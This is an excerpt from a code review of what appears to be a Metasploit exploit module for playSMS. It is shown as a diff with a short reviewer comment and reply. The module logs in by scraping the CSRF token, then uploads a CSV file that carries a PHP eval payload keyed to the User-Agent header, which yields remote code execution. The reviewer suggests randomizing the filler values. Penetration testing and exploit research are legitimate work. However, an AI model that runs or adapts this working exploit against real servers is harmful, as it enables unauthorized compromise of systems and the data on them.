modules/exploits/multi/http/playsms_uploadcsv_exec.rb

```diff
@@ -0,0 +1,198 @@
+        /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+        vprint_good("X-CSRF-Token for login : #{csrf}")
+
+        cookies = res.get_cookies
+        print_status('Trying to Login ......')
+        # Send Creds with cookies.
+        res = send_request_cgi({
+            'method' => 'POST',
+            'uri' => normalize_uri(uri, 'index.php'),
+            'cookie' => cookies,
+            'vars_get' => {
+                'app' => 'main',
+                'inc' => 'core_auth',
+                'route' => 'login',
+                'op' => 'login',
+            },
+            'vars_post' => Hash[{
+                'X-CSRF-Token' => csrf,
+                'username' => datastore['USERNAME'],
+                'password' => datastore['PASSWORD']
+            }.to_a.shuffle],
+        })
+
+        unless res
+            fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request")
+        end
+
+        # Try to access index page with authenticated cookie.
+        res = send_request_cgi({
+            'method' => 'GET',
+            'uri' => normalize_uri(uri, 'index.php'),
+            'cookie' => cookies,
+        })
+
+        # if we redirect to core_welcome dan we assume we have authenticated cookie.
+        if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
+            print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+            return cookies
+        else
+            fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+        end
+    end
+
+
+    # Tested successfully on Dina: 1.0.1 machine on vulnhub.
+    # Link : https://www.vulnhub.com/entry/dina-101,200/
+    def exploit
+
+        cookies = login
+
+        # Agian CSRF token.
+        res = send_request_cgi({
+            'uri' => normalize_uri(uri, 'index.php'),
+            'method' => 'GET',
+            'cookie' => cookies,
+            'vars_get' => {
+                'app' => 'main',
+                'inc' => 'feature_phonebook',
+                'route' => 'import',
+                'op' => 'list',
+            }
+        })
+
+        unless res
+            fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request")
+        end
+
+        # Grabbing CSRF token from body
+        /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+        vprint_good("X-CSRF-Token for upload : #{csrf}")
+
+        # Payload.
+        evil = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
+        #making csv file body
+        final_csv = "Name,Email,Department\n"
+        final_csv << evil
+        final_csv << ',2,3'
```

Comment:
Can these integers be randomized?
```ruby
        final_csv = "Name,Email,Department\n"
        final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}"
```

Reply:
yup , y i dint think this before ? .. hahahaha